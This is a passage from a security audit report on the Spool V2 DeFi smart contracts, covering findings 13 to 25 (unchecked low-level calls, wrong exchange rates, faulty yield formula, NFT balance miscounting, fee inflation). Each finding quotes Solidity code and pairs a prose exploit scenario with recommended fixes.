; i < tokensIn.length; ++i) { uint256 tokenInBalance = IERC20(tokensIn[i]).balanceOf( address ( this )); if (tokenInBalance > 0 ) { IERC20(tokensIn[i]).safeTransfer(receiver, tokenInBalance); } } Figure 13.1: The swap function in spool-v2-core/Swapper.sol#L29–L45 The Solidity documentation includes the following warning: The low-level functions call, delegatecall and staticcall return true as their first return value if the account called is non-existent, as part of the design of the EVM. Account existence must be checked prior to calling if needed. Figure 13.2: The Solidity documentation details the necessity of executing existence checks before performing low-level calls. Therefore, if the swapTarget address is incorrect or the target contract has been destroyed, the execution will not revert even if the swap is not successful. We rated this finding as only a low-severity issue because the Swapper contract transfers the unswapped tokens to the receiver if a swap is not successful. However, the CompoundV2Strategy contract uses the Swapper contract to exchange COMP tokens for underlying tokens (figure 13.3). function _compound( address [] calldata tokens, SwapInfo[] calldata swapInfo, uint256 [] calldata ) internal override returns ( int256 compoundedYieldPercentage) { if (swapInfo.length > 0) { address [] memory markets = new address [](1); markets[0] = address (cToken); comptroller.claimComp( address ( this ), markets); uint256 compBalance = comp.balanceOf(address(this)); if (compBalance > 0) { comp.safeTransfer(address(swapper), compBalance); address [] memory tokensIn = new address [](1); tokensIn[0] = address(comp); uint256 swappedAmount = swapper.swap(tokensIn, swapInfo, tokens, address(this))[0]; if ( swappedAmount > 0) { uint256 cTokenBalanceBefore = cToken.balanceOf( address ( this )); _depositToCompoundProtocol (IERC20(tokens[0]), swappedAmount); uint256 cTokenAmountCompounded = cToken.balanceOf( address ( this )) - cTokenBalanceBefore; _calculateYieldPercentage(cTokenBalanceBefore, cTokenAmountCompounded); compoundedYieldPercentage = } } } } Figure 13.3: The _compound function in spool-v2-core/CompoundV2Strategy.sol If the swap operation fails, the COMP will stay in CompoundV2Strategy . This will cause users to lose the yield they would have gotten from compounding. Because the swap operation fails silently, the “do hard worker” may not notice that yield is not compounding. As a result, users will receive less in profit than they otherwise would have. The GuardManager.runGuards function, which uses the address().staticcall() function, is also affected by this issue. However, the return value of the call is decoded, so the calls would not fail silently. Exploit Scenario The Spool team deploys CompoundV2Strategy with a market that gives COMP tokens to its users. While executing the doHardWork function for smart vaults using CompoundV2Strategy , the “do hard worker” sets the swapTarget address to an incorrect address. The swap operation to exchange COMP to the underlying token fails silently. The gained yield is not deposited into the market. The users receive less in profit. Recommendations Short term, implement a contract existence check before the low-level calls in GuardManager.runGuards and Swapper.swap . Long term, avoid implementing low-level calls. If such calls are unavoidable, carefully review the Solidity documentation , particularly the “Warnings” section, before implementing them to ensure that they are implemented correctly. 14. Incorrect use of exchangeRates in doHardWork Severity: High Difficulty: Low Type: Undefined Behavior Finding ID: TOB-SPL-14 Target: managers/StrategyRegistry.sol Description The StrategyRegistry contract’s doHardWork function fetches the exchangeRates for all of the tokens involved in the “do hard work” process, and then it iterates over the strategies and saves the exchangeRates values for the current strategy’s tokens in the assetGroupExchangeRates variable; however, when doHardWork is called for a strategy, the exchangeRates variable rather than the assetGroupExchangeRates variable is passed, resulting in the use of incorrect exchange rates. function doHardWork(DoHardWorkParameterBag calldata dhwParams) external whenNotPaused { ... // Get exchange rates for tokens and validate them against slippages. uint256 [] memory exchangeRates = SpoolUtils.getExchangeRates(dhwParams.tokens, _priceFeedManager); for ( uint256 i; i < dhwParams.tokens.length; ++i) { if ( exchangeRates[i] < dhwParams.exchangeRateSlippages[i][0] || exchangeRates[i] > dhwParams.exchangeRateSlippages[i][1] revert ExchangeRateOutOfSlippages(); ) { } } ... // Get exchange rates for this group of strategies. uint256 assetGroupId = IStrategy(dhwParams.strategies[i][0]).assetGroupId(); address [] memory assetGroup = IStrategy(dhwParams.strategies[i][0]).assets(); uint256 [] memory assetGroupExchangeRates = new uint256 [](assetGroup.length); for (uint256 j; j < assetGroup.length; ++j) { bool found = false ; for ( uint256 k; k < dhwParams.tokens.length; ++k) { if (assetGroup[j] == dhwParams.tokens[k]) { assetGroupExchangeRates[j] = exchangeRates[k]; found = true ; break ; } } ... // Do the hard work on the strategy. DhwInfo memory dhwInfo = IStrategy(strategy).doHardWork( StrategyDhwParameterBag({ swapInfo: dhwParams.swapInfo[i][j], compoundSwapInfo: dhwParams.compoundSwapInfo[i][j], slippages: dhwParams.strategySlippages[i][j], assetGroup: assetGroup, exchangeRates: exchangeRates , withdrawnShares: _sharesRedeemed[strategy][dhwIndex], masterWallet: address(_masterWallet), priceFeedManager: _priceFeedManager, baseYield: dhwParams.baseYields[i][j], platformFees: platformFeesMemory }) ); // Bookkeeping. _dhwAssetRatios[strategy] = IStrategy(strategy).assetRatio(); _exchangeRates[strategy][dhwIndex].setValues( exchangeRates ); ... Figure 14.1: A snippet of the doHardWork function in spool-v2-core/StrategyRegistry.sol#L222–L 341 The exchangeRates values are used by a strategy’s doHardWork function to calculate how many assets in USD value are to be deposited and how many in USD value are currently deposited in the strategy. As a consequence of using exchangeRates rather than assetGroupExchangeRates , the contract will return incorrect values. Additionally, the _exchangeRates variable is returned by the strategyAtIndexBatch function, which is used when simulating deposits. Exploit Scenario Bob deploys a smart vault, and users start depositing into it. However, the first time doHardWork is called, they notice that the deposited assets and the reported USD value deposited into the strategies are incorrect. They panic and start withdrawing all of the funds. Recommendations Short term, replace exchangeRates with assetGroupExchangeRates in the relevant areas of doHardWork and where it sets the _exchangeRates variable. Long term, improve the system’s unit and integration tests to verify that the deposited value in a strategy is the expected amount. Additionally, when reviewing the code, look for local variables that are set but then never used; this is a warning sign that problems may arise. 15. LinearAllocationProvider could return an incorrect result Severity: Medium Difficulty: Medium Type: Undefined Behavior Finding ID: TOB-SPL-15 Target: providers/LinearAllocationProvider.sol Description The LinearAllocationProvider contract returns an incorrect result when the given smart vault has a riskTolerance value of -8 due to an incorrect literal value in the riskArray variable. function calculateAllocation(AllocationCalculationInput calldata data) external pure returns ( uint256 [] memory ) { ... uint24 [21] memory riskArray = [ 100000, 95000, 900000 , ... ]; ... uint8 riskt = uint8 (data.riskTolerance + 10); // from 0 to 20 for ( uint8 i; i < data.apys.length; ++i) { ... results[i] = apy * riskArray[ uint8 (20 - riskt)] + risk * riskArray[ uint8 (riskt)] ; resSum += results[i]; } uint256 resSum2; for ( uint8 i; i < results.length; ++i) { results[i] = FULL_PERCENT * results[i] / resSum; resSum2 += results[i]; } results[0] += FULL_PERCENT - resSum2; return results; Figure 15.1: A snippet of the calculateAllocation function in spool-v2-core/LinearAllocationProvider.sol#L9–L67 The riskArray ’s third element is incorrect; this affects the computed allocation for smart vaults that have a riskTolerance value of -8 because the riskt variable would be 2 , which is later used as index for the riskArray . The subexpression risk * riskArray[uint8(rikst)] is incorrect by a factor of 10. Exploit Scenario Bob deploys a smart vault with a riskTolerance value of -8 and an empty strategyAllocation value. The allocation between the strategies is computed on the spot using the LinearAllocationProvider contract, but the allocation is wrong. Recommendations Short term, replace 900000 with 90000 in the calculateAllocation function. Long term, improve the system’s unit and integration tests to catch issues such as this. Document the use and meaning of constants such as the values in riskArray . This will make it more likely that the Spool team will find these types of mistakes. 16. Incorrect formula used for adding/subtracting two yields Severity: Medium Difficulty: Low Type: Undefined Behavior Finding ID: TOB-SPL-16 Target: manager/StrategyRegistry.sol , strategies/Strategy.sol Description The doHardWork function adds two yields with different base values to compute the given strategy’s total yield, which results in the collection of fewer ecosystem fees and treasury fees. It is incorrect to add two yields that have different base values. The correct formula to compute the total yield from two consecutive yields Y1 and Y2 is Y1 + Y2 + (Y1*Y2) . The doHardWork function in the Strategy contract adds the protocol yield and the rewards yield to calculate the given strategy’s total yield. The protocol yield percentage is calculated with the base value of the strategy’s total assets at the start of the current “do hard work” cycle, while the rewards yield percentage is calculated with the base value of the total assets currently owned by the strategy. dhwInfo.yieldPercentage = _getYieldPercentage(dhwParams.baseYield); dhwInfo.yieldPercentage += _compound(dhwParams.assetGroup, dhwParams.compoundSwapInfo, dhwParams.slippages); Figure 16.1: A snippet of the doHardWork function in spool-v2-core/Strategy.sol#L95–L96 Therefore, the total yield of the strategy is computed as less than its actual yield, and the use of this value to compute fees results in the collection of fewer fees for the platform’s governance system. Same issue also affects the computation of the total yield of a strategy on every “do hard work” cycle: _stateAtDhw[strategy][dhwIndex] = StateAtDhwIndex({ sharesMinted: uint128 (dhwInfo.sharesMinted), totalStrategyValue: uint128 (dhwInfo.valueAtDhw), totalSSTs: uint128 (dhwInfo.totalSstsAtDhw), yield: int96 (dhwInfo.yieldPercentage) + _stateAtDhw[strategy][dhwIndex - 1].yield, // accumulate the yield from before timestamp: uint32 (block.timestamp) }); Figure 16.2: A snippet of the doHardWork function in spool-v2-core/StrategyRegistry.sol#L331–L337 This value of the total yield of a strategy is used to calculate the management fees for a given smart vault, which results in fewer fees paid to the smart vault owner. Exploit Scenario The Spool team deploys the system. Alice deposits 1,000 tokens into a vault, which mints 1,000 strategy share tokens for the vault. On the next “do hard work” execution, the tokens earn 8% yield and 30 reward tokens from the protocol. The 30 reward tokens are then exchanged for 20 deposit tokens. At this point, the total tokens earned by the strategy are 100 and the total yield is 10%. However, the doHardWork function computes the total yield as 9.85%, which is incorrect, resulting in fewer fees collected for the platform. Recommendations Short term, use the correct formula to calculate a given strategy’s total yield in both the Strategy contract and the StrategyRegistry contract. Note that the syncDepositsSimulate function subtracts a strategy’s total yield at different “do hard work” indexes in DepositManager.sol#L322–L326 to compute the difference between the strategy’s yields between two “do hard work” cycles. After fixing this issue, this function’s computation will be incorrect. Long term, review the entire codebase to find all of the mathematical formulas used. Document these formulas, their assumptions, and their derivations to avoid the use of incorrect formulas. 17. Smart vaults with re-registered strategies will not be usable Severity: Low Difficulty: High Type: Undefined Behavior Finding ID: TOB-SPL-17 Target: manager/StrategyRegistry.sol Description The StrategyRegistry contract does not clear the state related to a strategy when removing it. As a result, if the removed strategy is registered again, the StrategyRegistry contract will still contain the strategy’s previous state, resulting in a temporary DoS of the smart vaults using it. The StrategyRegistry.registerStrategy function is used to register a strategy and to initialize the state related to it (figure 17.1). StrategyRegistry tracks the state of the strategies by using their address. function registerStrategy ( address strategy ) external { _checkRole(ROLE_SPOOL_ADMIN, msg.sender ); if (_accessControl.hasRole(ROLE_STRATEGY, strategy)) revert StrategyAlreadyRegistered({address_: strategy}); _accessControl.grantRole(ROLE_STRATEGY, strategy); _currentIndexes[strategy] = 1 ; _dhwAssetRatios[strategy] = IStrategy(strategy).assetRatio(); _stateAtDhw[ address (strategy)][ 0 ].timestamp = uint32 ( block.timestamp ); } Figure 17.1: The registerStrategy function in spool-v2-core/StrategyRegistry.sol The StrategyRegistry._removeStrategy function is used to remove a strategy by revoking its ROLE_STRATEGY role. function _removeStrategy ( address strategy ) private { if (!_accessControl.hasRole(ROLE_STRATEGY, strategy)) revert InvalidStrategy({address_: strategy}); _accessControl.revokeRole(ROLE_STRATEGY, strategy); } Figure 17.2: The _removeStrategy function in spool-v2-core/StrategyRegistry.sol While removing a strategy, StrategyRegistry contract does not remove the state related to that strategy. As a result, when that strategy is registered again, StrategyRegistry will contain values from the previous period. This could make the smart vaults using the strategy unusable or cause the unintended transfer of assets between other strategies and this strategy. Exploit Scenario Strategy S is registered. StrategyRegistry._currentIndex[S] is equal to 1 . Alice creates a smart vault X that uses strategy S. Bob deposits 1 million WETH into smart vault X. StrategyRegistry._assetsDeposited[S][1][WETH] is equal to 1 million WETH. The doHardWork function is called for strategy S. WETH is transferred from the master wallet to strategy S and is deposited into the protocol. A Spool system admin removes strategy S upon hearing that the protocol is being exploited. However, the admin realizes that the protocol is not being exploited and re-registers strategy S. StrategyRegistry._currentIndex[S] is set to 1 . StrategyRegistry._assetsDeposited[S][1][WETH] is not set to zero and is still equal to 1 million WETH. Alice creates a new vault with strategy S. When doHardWork is called for strategy S, StrategyRegistry tries to transfer 1 million WETH to the strategy. The master wallet does not have those assets, so doHardWork fails for strategy S. The smart vault becomes unusable. Recommendations Short term, modify the StrategyRegistry._removeStrategy function so that it clears states related to removed strategies if re-registering strategies is an intended use case. If this is not an intended use case, modify the StrategyRegistry.registerStrategy function so that it verifies that newly registered strategies have not been previously registered. Long term, properly document all intended use cases of the system and implement comprehensive tests to ensure that the system behaves as expected. 18. Incorrect handling of partially burned NFTs results in incorrect SVT balance calculation Severity: Low Difficulty: Medium Type: Undefined Behavior Finding ID: TOB-SPL-18 Target: manager/SmartVaultManager.sol , SmartVault.sol Description The SmartVault._afterTokenTransfer function removes the given NFT ID from the SmartVault._activeUserNFTIds array even if only a fraction of it is burned. As a result, the SmartVaultManager.getUserSVTBalance function, which uses SmartVault._activeUserNFTIds , will show less than the given user’s actual balance. SmartVault._afterTokenTransfer is executed after every token transfer (figure 18.1). function _afterTokenTransfer ( address , address from , address to , uint256 [] memory ids, uint256 [] memory , bytes memory ) internal override { // burn if (to == address ( 0 )) { uint256 count = _activeUserNFTCount[from]; for ( uint256 i ; i < ids.length; ++i) { for ( uint256 j = 0 ; j < count; j++) { if (_activeUserNFTIds[from][j] == ids[i]) { _activeUserNFTIds[from][j] = _activeUserNFTIds[from][count - 1 ]; count--; break ; } } } _activeUserNFTCount[from] = count; return ; } [...] } Figure 18.1: A snippet of the _afterTokenTransfer function in spool-v2-core/SmartVault.sol It removes the burned NFT from _activeUserNFTIds . However, it does not consider the amount of the NFT that was burned. As a result, NFTs that are not completely burned will not be considered active by the vault. SmartVaultManager.getUserSVTBalance uses SmartVault._activeUserNFTIds to calculate a given user’s SVT balance (figure 18.2). function getUserSVTBalance ( address smartVaultAddress , address userAddress ) external view returns ( uint256 ) { if (_accessControl.smartVaultOwner(smartVaultAddress) == userAddress) { (, uint256 ownerSVTs ,, uint256 fees ) = _simulateSync(smartVaultAddress); return ownerSVTs + fees; } uint256 currentBalance = ISmartVault(smartVaultAddress).balanceOf(userAddress); uint256 [] memory nftIds = ISmartVault(smartVaultAddress).activeUserNFTIds(userAddress); if (nftIds.length > 0 ) { currentBalance += _simulateNFTBurn(smartVaultAddress, userAddress, nftIds); } return currentBalance; } Figure 18.2: The getUserSVTBalance function in spool-v2-core/SmartVaultManager.sol Because partial NFTs are not present in SmartVault._activeUserNFTIds , the calculated balance will be less than the user’s actual balance. The front end using getUserSVTBalance will show incorrect balances to users. Exploit Scenario Alice deposits assets into a smart vault and receives a D-NFT. Alice's assets are deposited to the protocols after doHardWork is called. Alice claims SVTs by burning a fraction of her D-NFT. The smart vault removes the D-NFT from _activeUserNFTIds . Alice checks her SVT balance and panics when she sees less than what she expected. She withdraws all of her assets from the system. Recommendations Short term, add a check to the _afterTokenTransfer function so that it checks the balance of the NFT that is burned and removes the NFT from _activeUserNFTIds only when the NFT is burned completely. Long term, improve the system’s unit and integration tests to extensively test view functions. 19. Transfers of D-NFTs result in double counting of SVT balance Severity: Medium Difficulty: Low Type: Data Validation Finding ID: TOB-SPL-19 Target: manager/SmartVaultManager.sol , SmartVault.sol Description The _activeUserNFTIds and _activeUserNFTCount variables are not updated for the sender account on the transfer of NFTs. As a result, SVTs for transferred NFTs will be counted twice, causing the system to show an incorrect SVT balance. The _afterTokenTransfer hook in the SmartVault contract is executed after every token transfer to update information about users’ active NFTs: function _afterTokenTransfer ( address , address from , address to , uint256 [] memory ids, uint256 [] memory , bytes memory ) internal override { // burn if (to == address ( 0 )) { ... return ; } // mint or transfer for ( uint256 i; i < ids.length; ++i) { _activeUserNFTIds[to][_activeUserNFTCount[to]] = ids[i]; _activeUserNFTCount[to]++; } } Figure 19.1: A snippet of the _afterTokenTransfer function in spool-v2-core/SmartVault.sol When a user transfers an NFT to another user, the function adds the NFT ID to the active NFT IDs of the receiver’s account but does not remove the ID from the active NFT IDs of the sender’s account. Additionally, the active NFT count is not updated for the sender’s account. The getUserSVTBalance function of the SmartVaultManager contract uses the SmartVault contract’s _activeUserNFTIds array to calculate a given user’s SVT balance: function getUserSVTBalance ( address smartVaultAddress , address userAddress ) external view returns ( uint256 ) { if (_accessControl.smartVaultOwner(smartVaultAddress) == userAddress) { (, uint256 ownerSVTs ,, uint256 fees ) = _simulateSync(smartVaultAddress); return ownerSVTs + fees; } uint256 currentBalance = ISmartVault(smartVaultAddress).balanceOf(userAddress); uint256 [] memory nftIds = ISmartVault(smartVaultAddress).activeUserNFTIds(userAddress); if (nftIds.length > 0 ) { currentBalance += _simulateNFTBurn(smartVaultAddress, userAddress, nftIds); } return currentBalance; } Figure 19.2: The getUserSVTBalance function in spool-v2-core/SmartVaultManager.sol Because transferred NFT IDs are active for both senders and receivers, the SVTs corresponding to the NFT IDs will be counted for both users. This double counting will keep increasing the SVT balance for users with every transfer, causing an incorrect balance to be shown to users and third-party integrators. Exploit Scenario Alice deposits assets into a smart vault and receives a D-NFT. Alice's assets are deposited into the protocols after doHardWork is called. Alice transfers the D-NFT to herself. The SmartVault contract adds the D-NFT ID to _activeUserNFTIds for Alice again. Alice checks her SVT balance and sees double the balance she had before. Recommendations Short term, modify the _afterTokenTransfer function so that it removes NFT IDs from the active NFT IDs for the sender’s account when users transfer D-NFTs and W-NFTs. Long term, add unit test cases for all possible user interactions to catch issues such as this. 20. Flawed loop for syncing flushes results in higher management fees Severity: Medium Difficulty: Low Type: Data Validation Finding ID: TOB-SPL-20 Target: manager/SmartVaultManager.sol , manager/DepositManager.sol Description The loop used to sync flush indexes in the SmartVaultManager contract computes an inflated value of the oldTotalSVTs variable, which results in higher management fees paid to the smart vault owner. The _syncSmartVault function in the SmartVaultManager contract implements a loop to process every flush index from flushIndex.toSync to flushIndex.current : while (flushIndex.toSync < flushIndex.current) { ... DepositSyncResult memory syncResult = _depositManager.syncDeposits( smartVault, [flushIndex.toSync, bag.lastDhwSynced, bag.oldTotalSVTs], strategies_, [indexes, _getPreviousDhwIndexes(smartVault, flushIndex.toSync)], tokens, bag.fees ); bag.newSVTs += syncResult.mintedSVTs; bag.feeSVTs += syncResult.feeSVTs; bag.oldTotalSVTs += bag.newSVTs; bag.lastDhwSynced = syncResult.dhwTimestamp; emit SmartVaultSynced(smartVault, flushIndex.toSync); flushIndex.toSync++; } Figure 20.1: A snippet of the _syncSmartVault function in spool-v2-core/SmartVaultManager.sol This loop adds the value of mintedSVTs to the newSVTs variables and then computes the value of oldTotalSVTs by adding newSVTs to it in every iteration. Because mintedSVTs are added in every iteration, new minted SVTs are added for each flush index multiple times when the loop is iterated more than once. The value of oldTotalSVTs is then passed to the syncDeposit function of the DepositManager contract, which uses it to compute the management fee for the smart vault. The use of the inflated value of oldTotalSVTs causes higher management fees to be paid to the smart vault owner. Exploit Scenario Alice deposits assets into a smart vault and flushes it. Before doHardWork is executed, Bob deposits assets into the same smart vault and flushes it. At this point, flushIndex.current has been increased twice for the smart vault. After the execution of doHardWork , the loop to sync the smart vault is iterated twice. As a result, a double management fee is paid to the smart vault owner, and Alice and Bob lose assets. Recommendations Short term, modify the loop so that syncResult.mintedSVTs is added to bag.oldTotalSVTs instead of bag.newSVTs . Long term, be careful when implementing accumulators in loops. Add test cases for multiple interactions to catch such issues. 21. Incorrect ghost strategy check Severity: Informational Difficulty: Medium Type: Data Validation Finding ID: TOB-SPL-21 Target: manager/StrategyRegistry.sol Description The emergencyWithdraw and redeemStrategyShares functions incorrectly check whether a strategy is a ghost strategy after checking that the strategy has a ROLE_STRATEGY role. function emergencyWithdraw( address [] calldata strategies, uint256 [][] calldata withdrawalSlippages, bool removeStrategies ) external onlyRole(ROLE_EMERGENCY_WITHDRAWAL_EXECUTOR, msg.sender ) { for ( uint256 i; i < strategies.length; ++i) { _checkRole(ROLE_STRATEGY, strategies[i]); if (strategies[i] == _ghostStrategy) { continue ; } [...] Figure 21.1: A snippet the emergencyWithdraw function spool-v2-core/StrategyRegistry.sol#L456–L465 function redeemStrategyShares( address [] calldata strategies, uint256 [] calldata shares, uint256 [][] calldata withdrawalSlippages ) external { for ( uint256 i; i < strategies.length; ++i) { _checkRole(ROLE_STRATEGY, strategies[i]); if (strategies[i] == _ghostStrategy) { continue ; } [...] Figure 21.2: A snippet the emergencyWithdraw function spool-v2-core/StrategyRegistry.sol#L477–L486 A ghost strategy will never have the ROLE_STRATEGY role, so both functions will always incorrectly revert if a ghost strategy is passed in the strategies array. Exploit Scenario Bob calls redeemStrategyShares with the ghost strategy in strategies and the transaction unexpectedly reverts. Recommendations Short term, modify the affected functions so that they verify whether the given strategy is a ghost strategy before checking the role with _checkRole . Long term, clearly document which roles a contract should have and implement the appropriate checks to verify them. 22. Reward configuration not initialized properly when reward is zero Severity: Low Difficulty: Low Type: Undefined Behavior Finding ID: TOB-SPL-22 Target: rewards/RewardManager.sol Description The RewardManager.addToken function, which adds a new reward token for the given smart vault, does not initialize all configuration variables when the initial reward is zero. As a result, all calls to the RewardManager.extendRewardEmission function will fail, and rewards cannot be added for that vault. RewardManager.addToken adds a new reward token for the given smart vault. The reward tokens for a smart vault are tracked using the RewardManager.rewardConfiguration function. The tokenAdded value of the configuration is used to check whether the token has already been added for the vault (figure 22.1). function addToken ( address smartVault , IERC20 token, uint32 rewardsDuration , uint256 reward ) external onlyAdminOrVaultAdmin(smartVault, msg.sender ) exceptUnderlying(smartVault, token) { RewardConfiguration storage config = rewardConfiguration [smartVault][token]; if (tokenBlacklist[smartVault][token]) revert RewardTokenBlacklisted( address (token)); if ( config.tokenAdded != 0 ) revert RewardTokenAlreadyAdded( address (token)); if (rewardsDuration == 0 ) revert InvalidRewardDuration(); if (rewardTokensCount[smartVault] > 5 ) revert RewardTokenCapReached(); rewardTokens[smartVault][rewardTokensCount[smartVault]] = token; rewardTokensCount[smartVault]++; config.rewardsDuration = rewardsDuration; if ( reward > 0 ) { _extendRewardEmission(smartVault, token, reward); } } Figure 22.1: The addToken function in spool-v2-core/RewardManager.sol#L81–L101 However, RewardManager.addToken does not update config.tokenAdded , and the _extendRewardEmission function, which updates config.tokenAdded , is called only when the reward is greater than zero. RewardManager.extendRewardEmission is the only entry point to add rewards for a vault. It checks whether token has been previously added by verifying that tokenAdded is greater than zero (figure 22.2). function extendRewardEmission ( address smartVault , IERC20 token, uint256 reward , uint32 rewardsDuration ) external onlyAdminOrVaultAdmin(smartVault, msg.sender ) exceptUnderlying(smartVault, token) { if (tokenBlacklist[smartVault][token]) revert RewardTokenBlacklisted( address (token)); if (rewardsDuration == 0 ) revert InvalidRewardDuration(); if ( rewardConfiguration[smartVault][token].tokenAdded == 0 ) { revert InvalidRewardToken( address (token)); } [...] } Figure 22.2: The extendRewardEmission function in spool-v2-core/RewardManager.sol#L106–L119 Because tokenAdded is not initialized when the initial rewards are zero, the vault admin cannot add the rewards for the vault in that token. The impact of this issue is lower because the vault admin can use the RewardManager.removeReward function to remove the token and add it again with a nonzero initial reward. Note that the vault admin can only remove the token without blacklisting it because the config.periodFinish value is also not initialized when the initial reward is zero. Exploit Scenario Alice is the admin of a smart vault. She adds a reward token for her smart vault with the initial reward set to zero. Alice tries to add rewards using extendRewardEmission , and the transaction fails. She cannot add rewards for her smart vault. She has to remove the token and re-add it with a nonzero initial reward. Recommendations Short term, use a separate Boolean variable to track whether a token has been added for a smart vault, and have RewardManager.addToken initialize that variable. Long term, improve the system’s unit tests to cover all execution paths. 23. Missing function for removing reward tokens from the blacklist Severity: Informational Difficulty: High Type: Undefined Behavior Finding ID: TOB-SPL-23 Target: rewards/RewardManager.sol Description A Spool admin can blacklist a reward token for a smart vault through the RewardManager contract, but they cannot remove it from the blacklist. As a result, a reward token cannot be used again once it is blacklisted. The RewardManager.forceRemoveReward function blacklists the given reward token by updating the RewardManager.tokenBlacklist array (figure 23.1). Blacklisted tokens cannot be used as rewards. function forceRemoveReward ( address smartVault , IERC20 token) external onlyRole(ROLE_SPOOL_ADMIN, msg.sender ) { tokenBlacklist[smartVault][token] = true ; _removeReward(smartVault, token); delete rewardConfiguration[smartVault][token]; } Figure 23.1: The forceRemoveReward function in spool-v2-core/RewardManager.sol#L160–L165 However, RewardManager does not have a function to remove tokens from the blacklist. As a result, if the Spool admin accidentally blacklists a token, then the smart vault admin will never be able to use that token to send rewards. Exploit Scenario Alice is the admin of a smart vault. She adds WETH and token A as rewards. The value of token A declines rapidly, so a Spool admin decides to blacklist the token for Alice’s vault. The Spool admin accidentally supplies the WETH address in the call to forceRemoveReward . As a result, WETH is blacklisted, and Alice cannot send rewards in WETH. Recommendations Short term, add a function with the proper access controls to remove tokens from the blacklist. Long term, improve the system’s unit tests to cover all execution paths. 24. Risk of unclaimed shares due to loss of precision in reallocation operations Severity: Informational Difficulty: Low Type: Undefined Behavior Finding ID: TOB-SPL-24 Target: libraries/ReallocationLib.sol Description The ReallocationLib.calculateReallocation function releases strategy shares and calculates their USD value. The USD value is later converted into strategy shares in the ReallocationLib.doReallocation function. Because the conversion operations always round down, the number of shares calculated in doReallocation will be less than the shares released in calculateReallocation . As a result, some shares released in calculateReallocation will be unclaimed, as ReallocationLib distributes only the shares computed in doReallocation . ReallocationLib.calculateAllocation calculates the USD value that needs to be withdrawn from each of the strategies used by smart vaults (figure 24.1). The smart vaults release the shares equivalent to the calculated USD value. /** * @dev Calculates reallocation needed per smart vault. [...] * @return Reallocation of the smart vault: * - first index is 0 or 1 * - 0: * - second index runs over smart vault's strategies * - value is USD value that needs to be withdrawn from the strategy [...] */ function calculateReallocation ( [...] ) private returns ( uint256 [][] memory ) { [...] } else if (targetValue < currentValue) { // This strategy needs withdrawal. [...] IStrategy(smartVaultStrategies[i]). releaseShares (smartVault, sharesToRedeem ); // Recalculate value to withdraw based on released shares. reallocation[ 0 ][i] = IStrategy(smartVaultStrategies[i]).totalUsdValue() * sharesToRedeem / IStrategy(smartVaultStrategies[i]).totalSupply(); } } return reallocation ; } Figure 24.1: The calculateReallocation function in spool-v2-core/ReallocationLib.sol#L161–L207 The ReallocationLib.buildReallocationTable function calculates the reallocationTable value. The reallocationTable[i][j][0] value represents the USD amount that should move from strategy i to strategy j (figure 24.2). These USD amounts are calculated using the USD values of the released shares computed in ReallocationLib.calculateReallocation (represented by reallocation[0][i] in figure 24.1). /** [...] * @return Reallocation table: * - first index runs over all strategies i * - second index runs over all strategies j * - third index is 0, 1 or 2 * - 0: value represent USD value that should be withdrawn by strategy i and deposited into strategy j */ function buildReallocationTable ( [...] ) private pure returns ( uint256 [][][] memory ) { Figure 24.2: A snippet of buildReallocationTable function in spool-v2-core/ReallocationLib.sol#L209–L228 ReallocationLib.doReallocation calculates the total USD amount that should be withdrawn from a strategy (figure 24.3). This total USD amount is exactly equal to the sum of the USD values needed to be withdrawn from the strategy for each of the smart vaults. The doReallocation function converts the total USD value to the equivalent number of strategy shares. The ReallocationLib library withdraws this exact number of shares from the strategy and distributes them to other strategies that require deposits of these shares. function doReallocation ( [...] uint256 [][][] memory reallocationTable ) private { // Distribute matched shares and withdraw unamatched ones. for ( uint256 i ; i < strategies.length; ++i) { [...] { uint256 [ 2 ] memory totals; // totals[0] -> total withdrawals for ( uint256 j ; j < strategies.length; ++j) { totals[ 0 ] += reallocationTable[i][j][ 0 ] ; [...] } // Calculate amount of shares to redeem and to distribute. uint256 sharesToDistribute = // first store here total amount of shares that should have been withdrawn IStrategy(strategies[i]).totalSupply() * totals[ 0 ] / IStrategy(strategies[i]).totalUsdValue(); [...] } [...] Figure 24.3: A snippet of the doReallocation function in spool-v2-core/ReallocationLib.sol#L285–L350 Theoretically, the shares calculated for a strategy should be equal to the shares released by all of the smart vaults for that strategy. However, there is a loss of precision in both the calculateReallocation function’s calculation of the USD value of released shares and the doReallocation function’s conversion of the combined USD value to strategy shares. As a result, the number of shares released by all of the smart vaults will be less than the shares calculated in calculateReallocation . Because the ReallocationLib library only distributes these calculated shares, there will be some unclaimed strategy shares as dust. It is important to note that the rounding error could be greater than one in the context of multiple smart vaults. Additionally, the error could be even greater if the conversion results were rounded in the opposite direction: in that case, if the calculated shares were greater than the released shares, the reallocation would fail when burn and claim operations are executed. Recommendations Short term, modify the code so that it stores the number of shares released in calculateReallocation , and implement dustless calculations to build the reallocationTable value with the share amounts and the USD amounts. Have doReallocation use this reallocationTable value to calculate the value of sharesToDistribute . Long term, use Echidna to test system and mathematical invariants. 25. Curve3CoinPoolAdapter’s _addLiquidity reverts due to incorrect amounts deposited Severity: Medium Difficulty: Low Type: Undefined Behavior Finding ID: TOB-SPL-25 Target: strategies/curve/CurveAdapter.sol Description The _addLiquidity function loops through the amounts array but uses an additional element to keep track of whether deposits need to be made in the Strategy.doHardWork function. As a result, _addLiquidity overwrites the number of tokens to send for the first asset, causing far fewer tokens to be deposited than expected, thus causing the transaction to revert due to the slippage check. function _addLiquidity( uint256 [] memory amounts, uint256 slippage) internal { uint256 [N_COINS] memory curveAmounts; for ( uint256 i; i < amounts.length; ++i) { curveAmounts[assetMapping().get(i)] = amounts[i]; } ICurve3CoinPool(pool()).add_liquidity(curveAmounts, slippage); } Figure 25.1: The _addLiquidity function in spool-v2-core/CurveAdapter.sol#L12–L20 The last element in the doHardWork function’s assetsToDeposit array keeps track of the deposits to be made and is incremented by one on each iteration of assets in assetGroup if that asset has tokens to deposit. This variable is then passed to the _depositToProtocol function and then, for strategies that use the Curve3CoinPoolAdapter , is passed to _addLiquidity in the amounts parameter. When _addLiquidity iterates over the last element in the amounts array, the assetMapping().get(i) function will return 0 because i in assetMapping is uninitialized. This return value will overwrite the number of tokens to deposit for the first asset with a strictly smaller amount. function doHardWork(StrategyDhwParameterBag calldata dhwParams) external returns (DhwInfo memory dhwInfo) { _checkRole(ROLE_STRATEGY_REGISTRY, msg.sender ); // assetsToDeposit[0..token.length-1]: amount of asset i to deposit // assetsToDeposit[token.length]: is there anything to deposit uint256 [] memory assetsToDeposit = new uint256 [](dhwParams.assetGroup.length + 1); unchecked { for ( uint256 i; i < dhwParams.assetGroup.length; ++i) { assetsToDeposit[i] = IERC20(dhwParams.assetGroup[i]).balanceOf(address(this)); if (assetsToDeposit[i] > 0) { 